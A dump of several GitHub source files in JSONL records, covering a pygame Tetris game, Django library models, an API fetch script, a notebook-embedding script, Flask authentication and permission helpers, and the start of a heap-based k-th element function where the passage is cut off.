+{"seq_id":"12588362040","text":"import random, time, pygame, sys\nfrom pygame.locals import *\n\nFPS = 25\nWINDOWWIDTH = 640\nWINDOWHEIGHT = 480\nBOXSIZE = 20\nBOARDWIDTH = 10\nBOARDHEIGHT = 20\nBLANK = '.'\n\nXMARGIN = int((WINDOWWIDTH - BOARDWIDTH * BOXSIZE) / 2)\nTOPMARGIN = WINDOWHEIGHT - (BOARDHEIGHT * BOXSIZE) - 5\n\nMOVESIDEWAYSFREQ = 0.15\nMOVEDOWNFREQ = 0.1\n\nWHITE = (255, 255, 255)\nGRAY = (185, 185, 185)\nBLACK = (0, 0, 0)\nLIGHTRED = (255, 0, 0)\nRED = (200, 20, 20)\nLIGHTGREEN = (0, 255, 0)\nGREEN = (20, 185, 20)\nLIGHTBLUE = (0, 0, 255)\nBLUE = (20, 20, 200)\nLIGHTYELLOW = (255, 255, 0)\nYELLOW = (200, 200, 20)\nLIGHTPURPLE = (162, 0, 124)\nPURPLE = (120, 0, 98)\nLIGHTPINK = (223, 53, 57)\nPINK = (200, 46, 49)\n\nBORDERCOLOR = WHITE # board border color\nBGCOLOR = BLACK # board background color\nTEXTCOLOR = WHITE # color of the text shown on screen\nTEXTSHADOWCOLOR = GRAY # color of the text shadow\nCOLORS = (BLUE, GREEN, RED, YELLOW, PURPLE, PINK, GRAY)\nLIGHTCOLORS = (LIGHTBLUE, LIGHTGREEN, LIGHTRED, LIGHTYELLOW, LIGHTPURPLE, LIGHTPINK, WHITE)\nassert len(COLORS) == len(LIGHTCOLORS) # every color must have a matching light color\nTEMPLATEWIDTH = 5\nTEMPLATEHEIGHT = 5\nS_SHAPE_TEMPLATE = [['.....',\n                     '.....',\n                     '..OO.',\n                     '.OO..',\n                     '.....'],\n                    ['.....',\n                     '..O..',\n                     '..OO.',\n                     '...O.',\n                     '.....']]\nZ_SHAPE_TEMPLATE = [['.....',\n                     '.....',\n                     '.OO..',\n                     '..OO.',\n                     '.....'],\n                    ['.....',\n                     '..O..',\n                     '.OO..',\n                     '.O...',\n                     '.....']]\nI_SHAPE_TEMPLATE = [['..O..',\n                     '..O..',\n                     '..O..',\n                     '..O..',\n                     '.....'],\n                    ['.....',\n                     '.....',\n                     'OOOO.',\n                     '.....',\n                     '.....']]\nO_SHAPE_TEMPLATE = [['.....',\n                     '.....',\n                     '.OO..',\n                     '.OO..',\n                     '.....']]\nJ_SHAPE_TEMPLATE = [['.....',\n                     '.O...',\n                     '.OOO.',\n                     '.....',\n                     '.....'],\n                    ['.....',\n                     '..OO.',\n                     '..O..',\n                     '..O..',\n                     '.....'],\n                    ['.....',\n                     '.....',\n                     '.OOO.',\n                     '...O.',\n                     '.....'],\n                    ['.....',\n                     '..O..',\n                     '..O..',\n                     '.OO..',\n                     '.....']]\nL_SHAPE_TEMPLATE = [['.....',\n                     '...O.',\n                     '.OOO.',\n                     '.....',\n                     '.....'],\n                    ['.....',\n                     '..O..',\n                     '..O..',\n                     '..OO.',\n                     '.....'],\n                    ['.....',\n                     '.....',\n                     '.OOO.',\n                     '.O...',\n                     '.....'],\n                    ['.....',\n                     '.OO..',\n                     '..O..',\n                     '..O..',\n                     '.....']]\nT_SHAPE_TEMPLATE = [['.....',\n                     '..O..',\n                     '.OOO.',\n                     '.....',\n                     '.....'],\n                    ['.....',\n                     '..O..',\n                     '..OO.',\n                     '..O..',\n                     '.....'],\n                    ['.....',\n                     '.....',\n                     '.OOO.',\n                     '..O..',\n                     '.....'],\n                    ['.....',\n                     '..O..',\n                     '.OO..',\n                     '..O..',\n                     '.....']]\nSHAPES = {'S': S_SHAPE_TEMPLATE,\n          'Z': Z_SHAPE_TEMPLATE,\n          'J': J_SHAPE_TEMPLATE,\n          'L': L_SHAPE_TEMPLATE,\n          'I': I_SHAPE_TEMPLATE,\n          'O': O_SHAPE_TEMPLATE,\n          'T': T_SHAPE_TEMPLATE}\n\ndef updateScore(nscore):\n    score = maxScore()\n    with open('scores.txt', 'w') as f:\n        if int(score) > nscore:\n            f.write(str(score))\n        else:\n            f.write(str(nscore))\n\ndef maxScore():\n    with open('scores.txt', 'r') as f:\n        lines = f.readlines()\n        score = lines[0].strip()\n    return score\n\ndef main():\n    global FPSCLOCK, DISPLAYSURF, BASICFONT, BIGFONT\n    pygame.init()\n    FPSCLOCK = pygame.time.Clock()\n    DISPLAYSURF = pygame.display.set_mode((WINDOWWIDTH, WINDOWHEIGHT))\n    BASICFONT = pygame.font.SysFont('Cooper Black', 17)\n    BIGFONT = pygame.font.SysFont('comicsans', 100)\n    pygame.display.set_caption('Tetromino')\n    showTextScreen('Tetromino')\n\n    icon = pygame.image.load('tetris.png')\n    pygame.display.set_icon(icon)\n\n    while True: # game loop\n        #pygame.mixer.music.load('tetris_BGMUSIC.mp3')\n        #pygame.mixer.music.play(-1, 0.0)\n        runGame()\n        #pygame.mixer.music.stop()\n        showTextScreen('Game Over')\n\ndef runGame():\n    # setup variables for the start of the game\n    background = pygame.image.load('tetris_bg.jpg')\n    board = getBlankBoard()\n    lastMoveDownTime = time.time()\n    lastMoveSidewaysTime = time.time()\n    lastFallTime = time.time()\n    movingDown = False\n    movingLeft = False\n    movingRight = False\n    score = 0\n    level, fallFreq = calculateLevelAndFallFreq(score)\n\n    fallingPiece = getNewPiece()\n    nextPiece = getNewPiece()\n\n    while True: # main game loop\n        if fallingPiece == None:\n            # no piece is currently falling, so start a new one\n            fallingPiece = nextPiece\n            nextPiece = getNewPiece()\n            lastFallTime = time.time() # reset lastFallTime\n            if not isValidPosition(board, fallingPiece):\n                return # game over: no room on the board for the next piece\n\n        checkForQuit()\n        updateScore(score)\n        for event in pygame.event.get(): # event handling loop\n            if event.type == KEYUP:\n                if (event.key == K_p):\n                    pygame.mixer.music.stop()\n                    showTextScreen('Paused')\n                    pygame.mixer.music.play(-1, 0.0)\n                    lastFallTime = time.time()\n                    lastMoveDownTime = time.time()\n                    lastMoveSidewaysTime = time.time()\n                elif (event.key == K_LEFT):\n                    movingLeft = False\n                elif (event.key == K_RIGHT):\n                    movingRight = False\n                elif (event.key == K_DOWN):\n                    movingDown = False\n\n            elif event.type == KEYDOWN:\n                if (event.key == K_LEFT) and isValidPosition(board, fallingPiece, adjX=-1):\n                    fallingPiece['x'] -= 1\n                    movingLeft = True\n                    movingRight = False\n                    lastMoveSidewaysTime = time.time()\n                elif (event.key == K_RIGHT) and isValidPosition(board, fallingPiece, adjX=1):\n                    fallingPiece['x'] += 1\n                    movingRight = True\n                    movingLeft = False\n                    lastMoveSidewaysTime = time.time()\n\n                # rotating the block (if there is room to rotate)\n                elif (event.key == K_UP):\n                    fallingPiece['rotation'] = (fallingPiece['rotation'] + 1) % len(SHAPES[fallingPiece['shape']])\n                    if not isValidPosition(board, fallingPiece):\n                        fallingPiece['rotation'] = (fallingPiece['rotation'] - 1) % len(SHAPES[fallingPiece['shape']])\n\n                # making the block fall faster with the down key\n                elif (event.key == K_DOWN):\n                    movingDown = True\n                    if isValidPosition(board, fallingPiece, adjY=1):\n                        fallingPiece['y'] += 1\n                    lastMoveDownTime = time.time()\n                # move the current block all the way down\n                elif event.key == K_SPACE:\n                    movingDown = False\n                    movingLeft = False\n                    movingRight = False\n                    for i in range(1, BOARDHEIGHT):\n                        if not isValidPosition(board, fallingPiece, adjY=i):\n                            break\n                    fallingPiece['y'] += i - 1\n\n        # keep moving while a key is held down\n        if (movingLeft or movingRight) and time.time() - lastMoveSidewaysTime > MOVESIDEWAYSFREQ:\n            if movingLeft and isValidPosition(board, fallingPiece, adjX=-1):\n                fallingPiece['x'] -= 1\n            elif movingRight and isValidPosition(board, fallingPiece, adjX=1):\n                fallingPiece['x'] += 1\n            lastMoveSidewaysTime = time.time()\n\n        if movingDown and time.time()-lastMoveDownTime>MOVEDOWNFREQ and isValidPosition(board,fallingPiece,adjY=1):\n            fallingPiece['y'] += 1\n            lastMoveDownTime = time.time()\n\n        # let the piece fall if it is time to fall\n        if time.time() - lastFallTime > fallFreq:\n            if not isValidPosition(board, fallingPiece, adjY=1):\n                # the falling piece has landed, so add it to the board\n                addToBoard(board, fallingPiece)\n                score += removeCompleteLines(board)\n                level, fallFreq = calculateLevelAndFallFreq(score)\n                fallingPiece = None\n            else: # otherwise keep the piece moving down\n                fallingPiece['y'] += 1\n                lastFallTime = time.time()\n        # drawing everything on the screen\n        DISPLAYSURF.blit(background, (0, 0))\n        drawBoard(board)\n        drawGrid()\n        lastScore = maxScore()\n        drawStatus(score, level, lastScore)\n        drawNextPiece(nextPiece)\n        if fallingPiece != None:\n            drawPiece(fallingPiece)\n\n        pygame.display.update()\n        FPSCLOCK.tick(FPS)\n\ndef makeTextObjs(text, font, color):\n    surf = font.render(text, True, color)\n    return surf, surf.get_rect()\n\ndef terminate():\n    pygame.quit()\n    sys.exit()\n\ndef checkForKeyPress():\n    checkForQuit()\n    for event in pygame.event.get([KEYDOWN, KEYUP]):\n        if event.type == KEYDOWN:\n            continue\n        return event.key\n    return None\n\ndef showTextScreen(text):\n    # draw the drop shadow of the large text\n    titleSurf, titleRect = makeTextObjs(text, BIGFONT, TEXTSHADOWCOLOR)\n    titleRect.center = (int(WINDOWWIDTH / 2), int(WINDOWHEIGHT / 2))\n    DISPLAYSURF.blit(titleSurf, titleRect)\n    # draw the large text centered\n    titleSurf, titleRect = makeTextObjs(text, BIGFONT, WHITE)\n    titleRect.center = (int(WINDOWWIDTH / 2) - 3, int(WINDOWHEIGHT / 2) - 3)\n    DISPLAYSURF.blit(titleSurf, titleRect)\n    # draw the prompt text below\n    font = pygame.font.SysFont('comicsans', 40)\n    pressKeySurf, pressKeyRect = makeTextObjs('Press Any Key To Play.', font, LIGHTYELLOW)\n    pressKeyRect.center = (int(WINDOWWIDTH / 2), int(WINDOWHEIGHT / 2) + 100)\n    DISPLAYSURF.blit(pressKeySurf, pressKeyRect)\n\n    while checkForKeyPress() == None:\n        pygame.display.update()\n        FPSCLOCK.tick()\n\ndef checkForQuit():\n    for event in pygame.event.get(QUIT):\n        terminate()\n    for event in pygame.event.get(KEYUP):\n        if event.key == K_ESCAPE:\n            terminate()\n        pygame.event.post(event)\n\ndef calculateLevelAndFallFreq(score):\n    level = int(score / 10) + 1\n    fallFreq = 0.27 - (level * 0.01)\n    return level, fallFreq\n\ndef getNewPiece():\n    shape = random.choice(list(SHAPES.keys()))\n    newPiece = {'shape': shape,\n                'rotation': random.randint(0, len(SHAPES[shape]) - 1),\n                'x': int(BOARDWIDTH / 2) - int(TEMPLATEWIDTH / 2),\n                'y': -2, # spawns above the top middle of the board\n                'color': random.randint(0, len(COLORS) - 1)}\n    return newPiece\n\ndef addToBoard(board, piece):\n    for x in range(TEMPLATEWIDTH):\n        for y in range(TEMPLATEHEIGHT):\n            if SHAPES[piece['shape']][piece['rotation']][y][x] != BLANK:\n                board[x + piece['x']][y + piece['y']] = piece['color']\n\ndef getBlankBoard():\n    board = []\n    for i in range(BOARDWIDTH):\n        board.append([BLANK] * BOARDHEIGHT)\n    return board\n\ndef isOnBoard(x, y):\n    return x >= 0 and x < BOARDWIDTH and y < BOARDHEIGHT\n\ndef isValidPosition(board, piece, adjX=0, adjY=0):\n    for x in range(TEMPLATEWIDTH):\n        for y in range(TEMPLATEHEIGHT):\n            isAboveBoard = y + piece['y'] + adjY < 0\n            if isAboveBoard or SHAPES[piece['shape']][piece['rotation']][y][x] == BLANK:\n                continue\n            if not isOnBoard(x + piece['x'] + adjX, y + piece['y'] + adjY):\n                return False\n            if board[x + piece['x'] + adjX][y + piece['y'] + adjY] != BLANK:\n                return False\n    return True\n\ndef isCompleteLine(board, y):\n    for x in range(BOARDWIDTH):\n        if board[x][y] == BLANK:\n            return False\n    return True\n\ndef removeCompleteLines(board):\n    numLinesRemoved = 0 # number of removed lines\n    y = BOARDHEIGHT - 1\n    while y >= 0:\n        if isCompleteLine(board, y):\n            # remove the line and move the boxes above it down\n            for pullDownY in range(y, 0, -1):\n                for x in range(BOARDWIDTH):\n                    board[x][pullDownY] = board[x][pullDownY - 1]\n            # clear the very top line\n            for x in range(BOARDWIDTH):\n                board[x][0] = BLANK\n            numLinesRemoved += 1\n        else:\n            y -= 1\n    return numLinesRemoved\n\ndef convertToPixelCoords(boxx, boxy):\n    return (XMARGIN + (boxx * BOXSIZE)), (TOPMARGIN + (boxy * BOXSIZE))\n\ndef drawBox(boxx, boxy, color, pixelx=None, pixely=None):\n    if color == BLANK:\n        return\n    if pixelx == None and pixely == None:\n        pixelx, pixely = convertToPixelCoords(boxx, boxy)\n    pygame.draw.rect(DISPLAYSURF, COLORS[color], (pixelx + 1, pixely + 1, BOXSIZE - 1, BOXSIZE - 1))\n    pygame.draw.rect(DISPLAYSURF, LIGHTCOLORS[color], (pixelx + 1, pixely + 1, BOXSIZE - 4, BOXSIZE - 4))\n\ndef drawBoard(board):\n    pygame.draw.rect(DISPLAYSURF, BORDERCOLOR, (XMARGIN, TOPMARGIN, (BOARDWIDTH * BOXSIZE), (BOARDHEIGHT * BOXSIZE)),10)\n    pygame.draw.rect(DISPLAYSURF, BGCOLOR, (XMARGIN, TOPMARGIN, BOXSIZE * BOARDWIDTH, BOXSIZE * BOARDHEIGHT))\n    for x in range(BOARDWIDTH):\n        for y in range(BOARDHEIGHT):\n            drawBox(x, y, board[x][y])\n\ndef drawStatus(score, level, lastScore):\n    pygame.draw.rect(DISPLAYSURF, BORDERCOLOR, (475, 10, 150, 225), 5)\n    pygame.draw.rect(DISPLAYSURF, BGCOLOR, (475, 10, 150, 225))\n    # draw the score text\n    scoreSurf = BASICFONT.render('Score: %s' % score, True, TEXTCOLOR)\n    scoreRect = scoreSurf.get_rect()\n    scoreRect.topleft = (WINDOWWIDTH - 150, 20)\n    DISPLAYSURF.blit(scoreSurf, scoreRect)\n    # draw the level text\n    levelSurf = BASICFONT.render('Level: %s' % level, True, TEXTCOLOR)\n    levelRect = levelSurf.get_rect()\n    levelRect.topleft = (WINDOWWIDTH - 150, 50)\n    DISPLAYSURF.blit(levelSurf, levelRect)\n    # draw the highscore\n    highcoreSurf = BASICFONT.render('High Score: ' + lastScore, True, TEXTCOLOR)\n    highcorect = highcoreSurf.get_rect()\n    highcorect.topleft = (WINDOWWIDTH - 150, 200)\n    DISPLAYSURF.blit(highcoreSurf, highcorect)\n\ndef drawPiece(piece, pixelx=None, pixely=None):\n    shapeToDraw = SHAPES[piece['shape']][piece['rotation']]\n    if pixelx == None and pixely == None:\n        pixelx, pixely = convertToPixelCoords(piece['x'], piece['y'])\n    for x in range(TEMPLATEWIDTH):\n        for y in range(TEMPLATEHEIGHT):\n            if shapeToDraw[y][x] != BLANK:\n                drawBox(None, None, piece['color'], pixelx + (x * BOXSIZE), pixely + (y * BOXSIZE))\n\ndef drawNextPiece(piece):\n    # the Next Shape label\n    nextSurf = BASICFONT.render('Next Shape:', True, TEXTCOLOR)\n    nextRect = nextSurf.get_rect()\n    nextRect.topleft = (WINDOWWIDTH - 150, 80)\n    DISPLAYSURF.blit(nextSurf, nextRect)\n    # draw the next piece\n    drawPiece(piece, pixelx=WINDOWWIDTH - 120, pixely=100)\n\ndef drawGrid():\n    for i in range(BOARDHEIGHT):\n        pygame.draw.line(DISPLAYSURF, (33, 21, 81), (XMARGIN, TOPMARGIN + i * BOXSIZE),\n                         (XMARGIN + 200, TOPMARGIN + i * BOXSIZE))\n    for j in range(BOARDWIDTH):\n        pygame.draw.line(DISPLAYSURF, (33, 21, 81), (XMARGIN + j * BOXSIZE, TOPMARGIN),\n                         (XMARGIN + j * BOXSIZE, TOPMARGIN + 400))\n\nif __name__ == '__main__':\n    main()\n","repo_name":"DavidYate/tetris_game_python","sub_path":"Tetris.py","file_name":"Tetris.py","file_ext":"py","file_size_in_byte":16718,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"}
+{"seq_id":"22192146238","text":"from django.core.exceptions import ValidationError\nfrom django.db import models\nfrom django.db.models import Q\nfrom django.utils.translation import gettext_lazy as _\n\nfrom apps.core.models import BaseModel, Person\nfrom apps.library.models.play import ProgramType\n\n\nclass Author(BaseModel):\n    person = models.OneToOneField(\n        Person,\n        on_delete=models.CASCADE,\n        verbose_name=\"Человек\",\n        related_name=\"authors\",\n    )\n    quote = models.CharField(\n        max_length=200,\n        verbose_name=\"Цитата\",\n    )\n    biography = models.TextField(\n        max_length=3000,\n        verbose_name=\"Текст про автора\",\n    )\n    plays = models.ManyToManyField(\n        \"library.Play\",\n        related_name=\"authors\",\n        blank=True,\n        verbose_name=\"Пьесы автора\",\n        through=\"AuthorPlay\",\n    )\n    slug = models.SlugField(\n        \"Транслит фамилии для формирования адресной строки\",\n        unique=True,\n        help_text=\"Формируется автоматически, может быть изменен вручную\",\n        error_messages={\"unique\": \"Такой транслит уже используется, введите иной\"},\n    )\n\n    class Meta:\n        ordering = (\"person__last_name\",)\n        verbose_name = \"Автор\"\n        verbose_name_plural = \"Авторы\"\n\n    def __str__(self):\n        return f\"{self.person.last_name} {self.person.first_name}\"\n\n    def save(self, *args, **kwargs):\n        self.full_clean()\n        return super().save(*args, **kwargs)\n\n    def _has_person_before_saving(self):\n        return self.person_id is not None\n\n    @property\n    def image(self):\n        return self.person.image\n\n    @property\n    def achievements(self):\n        \"\"\"Get queryset with info about achievements.\"\"\"\n        return (\n            ProgramType.objects.filter(plays__authors=self)\n            .order_by(\"-plays__festival__year\", \"name\")\n            .distinct(\"plays__festival__year\", \"name\")\n            .values(\"id\", \"name\", \"plays__festival__year\")\n        )\n\n\nclass AuthorPlay(models.Model):\n    author = models.ForeignKey(\n        Author,\n        on_delete=models.RESTRICT,\n        related_name=\"author_plays\",\n        verbose_name=\"Автор\",\n    )\n    play = models.ForeignKey(\n        \"library.Play\",\n        on_delete=models.CASCADE,\n        related_name=\"author_plays\",\n        verbose_name=\"Пьеса\",\n    )\n    order = models.PositiveSmallIntegerField(\n        default=0,\n        verbose_name=\"Порядковый номер пьесы у автора\",\n    )\n\n    class Meta:\n        verbose_name = \"Отношение Автор-Пьеса\"\n        verbose_name_plural = \"Отношения Автор-Пьеса\"\n        ordering = (\"order\",)\n\n    def __str__(self):\n        return f\"Пьеса {self.play} - автор {self.author}\"\n\n    def save(self):\n        if 
AuthorPlay.objects.filter(author=self.author, play=self.play) and self.id is None:\n return\n return super().save()\n\n def clean(self):\n if AuthorPlay.objects.filter(~Q(id=self.id), author=self.author, play=self.play) and self.id is not None:\n raise ValidationError(\"Такая Пьеса уже есть у данного Автора\")\n return super().clean()\n\n\nclass SocialNetworkLink(BaseModel):\n class SocialNetwork(models.TextChoices):\n FACEBOOK = \"fb\", _(\"Facebook\")\n INSTAGRAM = \"inst\", _(\"Instagram\")\n YOUTUBE = \"ytube\", _(\"YouTube\")\n TELEGRAM = \"tlgrm\", _(\"Telegram\")\n VKONTAKTE = \"vk\", _(\"Вконтакте\")\n\n author = models.ForeignKey(\n Author,\n on_delete=models.CASCADE,\n related_name=\"social_networks\",\n verbose_name=\"Автор\",\n )\n name = models.CharField(\n max_length=200,\n choices=SocialNetwork.choices,\n verbose_name=\"Название\",\n )\n link = models.URLField(\n max_length=500,\n verbose_name=\"Ссылка\",\n )\n\n class Meta:\n verbose_name = \"Ссылка на социальную сеть\"\n verbose_name_plural = \"Ссылки на социальные сети\"\n constraints = (\n models.UniqueConstraint(\n fields=(\n \"author\",\n \"name\",\n ),\n name=\"unique_social_network\",\n ),\n )\n\n def __str__(self):\n return self.name\n\n\nclass OtherLink(BaseModel):\n author = models.ForeignKey(\n Author,\n related_name=\"other_links\",\n on_delete=models.CASCADE,\n verbose_name=\"Автор\",\n )\n name = models.CharField(\n max_length=200,\n verbose_name=\"Название\",\n )\n link = models.URLField(\n max_length=500,\n verbose_name=\"Ссылка\",\n )\n is_pinned = models.BooleanField(\n verbose_name=\"Закрепить ссылку\",\n help_text=\"Закрепить ссылку вверху страницы?\",\n )\n order = models.PositiveSmallIntegerField(\n default=0,\n verbose_name=\"Порядок\",\n help_text=\"Указывается для формирования порядка вывода информации\",\n )\n\n class Meta:\n ordering = (\"order\",)\n verbose_name = \"Публикации и другие материалы\"\n verbose_name_plural = \"Публикации и другие материалы\"\n constraints = (\n models.UniqueConstraint(\n fields=(\n \"author\",\n \"name\",\n ),\n name=\"unique_link\",\n ),\n )\n\n def __str__(self):\n return self.name\n","repo_name":"Studio-Yandex-Practicum/Lubimovka_backend","sub_path":"apps/library/models/author.py","file_name":"author.py","file_ext":"py","file_size_in_byte":5790,"program_lang":"python","lang":"en","doc_type":"code","stars":14,"dataset":"github-code","pt":"53"} +{"seq_id":"38851700871","text":"#!/usr/bin/python3\n\nimport requests\nimport json\n\napi_url = \"http://compras.dados.gov.br/licitacoes/v1/licitacoes.json\"\n\ndef get_all():\n response = requests.get(api_url)\n if (response.status_code != 200):\n print(\"ERROR:{}\".format(response))\n return response.json()[\"_embedded\"][\"licitacoes\"]\n\nlicitacoes = get_all()\n\nfor licitacao in licitacoes:\n id = licitacao[\"identificador\"]\n print(id)","repo_name":"mmoraesbr/kotlin-coroutine-benchmark","sub_path":"jmeter/create-csv.py","file_name":"create-csv.py","file_ext":"py","file_size_in_byte":410,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"53"} +{"seq_id":"29133476102","text":"from __future__ import annotations\n\nimport argparse\nimport json\nimport os\n\nimport torch\nimport tqdm\nfrom torch.utils.data import DataLoader\nfrom transformers import AutoModel, AutoTokenizer, DataCollatorWithPadding\n\nfrom data import TextDataset\n\n\ndef prepare_dataset(args: argparse.Namespace) -> tuple[list[str], DataLoader]:\n # Read the notebooks and extract all texts with their notebook 
names.\n names, texts = [], []\n for filename in tqdm.tqdm(os.listdir(args.notebook_dir)):\n name = os.path.splitext(filename)[0]\n with open(os.path.join(args.notebook_dir, filename)) as fp:\n notebook = json.load(fp)\n for text in notebook[\"source\"].values():\n names.append(name)\n texts.append(\" \".join(text.split()))\n\n tokenizer = AutoTokenizer.from_pretrained(args.model)\n dataloader = DataLoader(\n TextDataset(texts, tokenizer, args.max_length),\n batch_size=args.batch_size,\n num_workers=args.num_workers or os.cpu_count(),\n collate_fn=DataCollatorWithPadding(tokenizer, pad_to_multiple_of=8),\n persistent_workers=True,\n )\n return names, dataloader\n\n\n@torch.inference_mode()\ndef main(args: argparse.Namespace):\n os.makedirs(args.output_dir, exist_ok=True)\n\n # Prepare the dataset and pretrained model.\n names, dataloader = prepare_dataset(args)\n model = AutoModel.from_pretrained(args.model).cuda().eval()\n model.to(torch.float16 if args.use_fp16 else torch.float32)\n\n index, embeddings = 0, []\n for batch in tqdm.tqdm(dataloader):\n # Move the batch tensors to CUDA memory.\n batch = {k: v.cuda() for k, v in batch.items()}\n for embedding in model(**batch).last_hidden_state[:, 0]:\n if index > 0 and names[index - 1] != names[index]:\n # If generating the sentence embeddings in the current notebook is done,\n # then we will gather the embeddings for saving to the file, and clear\n # the embedding buffer for new notebook cells.\n filename = os.path.join(args.output_dir, f\"{names[index - 1]}.pt\")\n torch.save(torch.stack(embeddings), filename)\n embeddings = []\n embeddings.append(embedding)\n index += 1\n\n # Save the last notebook embeddings if the embedding buffer is not empty.\n if embeddings:\n filename = os.path.join(args.output_dir, f\"{names[-1]}.pt\")\n torch.save(torch.stack(embeddings), filename)\n\n\nif __name__ == \"__main__\":\n parser = argparse.ArgumentParser()\n parser.add_argument(\"model\")\n parser.add_argument(\"--notebook-dir\", default=\"resources/ai4code/train_cleaned\")\n parser.add_argument(\"--output-dir\", default=\"embeddings\")\n parser.add_argument(\"--max-length\", type=int, default=128)\n parser.add_argument(\"--batch-size\", type=int, default=4096)\n parser.add_argument(\"--num-workers\", type=int, default=os.cpu_count())\n parser.add_argument(\"--use-fp16\", default=False, action=\"store_true\")\n main(parser.parse_args())\n","repo_name":"affjljoo3581/Google-AI4Code-Understand-Code-in-Python-Notebooks","sub_path":"stage1/src/predict.py","file_name":"predict.py","file_ext":"py","file_size_in_byte":3039,"program_lang":"python","lang":"en","doc_type":"code","stars":8,"dataset":"github-code","pt":"53"} +{"seq_id":"42077115881","text":"import random\nimport string\nfrom werkzeug.utils import redirect\nfrom application import app\nfrom collections import defaultdict\nfrom flask import abort, session, redirect, request, url_for, flash\nfrom functools import wraps\nfrom os import getenv\nfrom performanceplatform.client.admin import AdminAPI\nfrom requests_oauthlib import OAuth2Session\nfrom requests import Timeout, ConnectionError\n\n\nenvironment = app.config.get('ENVIRONMENT', 'development')\n\n\n@app.context_processor\ndef view_helpers():\n return dict(\n user_has_feature=user_has_feature\n )\n\n\ndef requires_authentication(f):\n @wraps(f)\n def verify_user_logged_in(*args, **kwargs):\n if not signed_in(session):\n return redirect(url_for('root'))\n else:\n admin_client = get_admin_client(session)\n kwargs['admin_client'] = admin_client\n 
return f(*args, **kwargs)\n return verify_user_logged_in\n\n\ndef requires_feature(feature):\n \"\"\"\n Used for application level requests from a client.\n \"\"\"\n def wrap(f):\n\n @wraps(f)\n def verify_user_has_feature(*args, **kwargs):\n\n if not signed_in(session):\n return redirect(url_for('root'))\n\n if user_has_feature(feature, session['oauth_user']):\n return f(*args, **kwargs)\n else:\n return redirect(url_for('root'))\n\n return verify_user_has_feature\n\n return wrap\n\n\ndef api_permission_required(permission=None):\n \"\"\"\n Used for API level requests originating from signonotron.\n \"\"\"\n def decorator(f):\n @wraps(f)\n def verify_api_user_has_permission(*args, **kwargs):\n if permission is None:\n raise Exception('@api_permission_required needs an argument')\n\n access_token = _extract_bearer_token(request)\n\n if access_token is None:\n abort(401, 'no access token given.')\n\n user = _get_user(access_token)\n\n if user is None:\n # This is very unexpected, since we expect the token to come\n # from signonotron. Possibly under attack, or crossing the\n # environments?\n abort(401, 'invalid access token.')\n\n if permission in user['user']['permissions']:\n session['oauth_user'] = user['user']\n session['oauth_token'] = {\n 'access_token': access_token\n }\n return f(*args, **kwargs)\n else:\n abort(403, 'user lacks permission.')\n\n return verify_api_user_has_permission\n\n return decorator\n\n\ndef get_admin_client(session):\n return AdminAPI(app.config['STAGECRAFT_HOST'],\n session['oauth_token']['access_token'])\n\n\ndef base_template_context():\n return {\n 'environment': {\n 'name': environment,\n 'human_name': environment.capitalize()\n }\n }\n\n\ndef signed_in(session):\n return(has_user_with_token(session)\n and not no_access(session['oauth_user']))\n\n\ndef signed_in_no_access(session):\n return(has_user_with_token(session)\n and no_access(session['oauth_user']))\n\n\ndef has_user_with_token(session):\n return('oauth_token' in session\n and 'access_token' in session['oauth_token']\n and 'oauth_user' in session)\n\n\ndef no_access(session_oauth_user):\n return('permissions' not in session_oauth_user\n or 'signin' not in session_oauth_user['permissions'])\n\n\ndef group_by_group(data_sets):\n grouped_data_sets = defaultdict(list)\n for item in data_sets:\n grouped_data_sets[item['data_group']].append(item)\n return grouped_data_sets\n\n\ndef _extract_bearer_token(request):\n auth_header = request.headers.get('Authorization', None)\n if auth_header is None:\n return None\n\n return _get_valid_token(auth_header)\n\n\ndef _get_valid_token(auth_header):\n \"\"\"\n >>> _get_valid_token(u'Bearer some-token') == 'some-token'\n True\n >>> _get_valid_token('Bearer ') is None\n True\n >>> _get_valid_token('Something Else') is None\n True\n \"\"\"\n prefix = 'Bearer '\n if not auth_header.startswith(prefix):\n return None\n\n token = auth_header[len(prefix):]\n return token if len(token) else None\n\n\ndef _get_user(token):\n gds_session = OAuth2Session(\n app.config['SIGNON_OAUTH_ID'],\n token={'access_token': token, 'type': 'Bearer'},\n )\n try:\n user_request = gds_session.get('{0}/user.json'.format(\n app.config['SIGNON_BASE_URL']), timeout=30)\n except (Timeout, ConnectionError):\n abort(500, 'Error connecting to signon service')\n if str(user_request.status_code)[0] in ('4', '5'):\n abort(user_request.status_code, user_request.reason)\n try:\n return user_request.json()\n except ValueError:\n abort(500, 'Unable to parse signon json')\n\n\ndef 
to_error_list(form_errors):\n def format_error(error):\n return '{0}'.format(error)\n\n messages = []\n for field_name, field_errors in form_errors.items():\n messages.append('; '.join(map(format_error, field_errors)))\n return 'You have errors in your form: ' + '; '.join(messages) + '.'\n\n\n@app.template_filter('format_status')\ndef format_status(s):\n return s.title().replace('-', ' ')\n\n\ndef generate_bearer_token():\n return ''.join(random.choice(string.lowercase + string.digits)\n for i in range(64))\n\n\ndef redirect_if_module_exists(module_name):\n def wrap(func):\n @wraps(func)\n def check_and_redirect(*args, **kwargs):\n admin_client = kwargs['admin_client']\n uuid = kwargs['uuid']\n dashboard_dict = admin_client.get_dashboard(uuid)\n if \"modules\" in dashboard_dict.keys():\n data_types = [module[\"data_type\"]\n for module in dashboard_dict[\"modules\"]\n if 'data_type' in module]\n if module_name in data_types:\n flash(\"Module already exists\", 'info')\n return redirect(url_for(\n 'dashboard_hub', uuid=uuid))\n return func(*args, **kwargs)\n return check_and_redirect\n return wrap\n\n\ndef user_has_feature(feature, user):\n if not user:\n return False\n roles = app.config.get('ROLES')\n user_role_definitions = filter(\n lambda definition: definition['role'] in user['permissions'], roles)\n user_role_features = map(\n lambda definition: definition['features'], user_role_definitions)\n if len(user_role_features) == 0:\n return False\n return feature in set(reduce(\n lambda item, memo: memo + item, user_role_features))\n","repo_name":"alphagov/performanceplatform-admin","sub_path":"application/helpers.py","file_name":"helpers.py","file_ext":"py","file_size_in_byte":6759,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"23381618508","text":"from heapq import heapify, heappop\n\n\ndef get_kth_element(arr: list, k: int) -> int: # O(NlogN)\n \"\"\"\n Ищет k-ый по порядку элемент массива.\n\n :param arr: изначальный массив,\n :param k: порядковая статистика,\n :return: число, соответствующее k-ой статистике.\n \"\"\"\n heapify(arr)\n el = None\n\n for i in range(k + 1):\n el = heappop(arr)\n\n return el\n\n\ndef solution():\n arr = 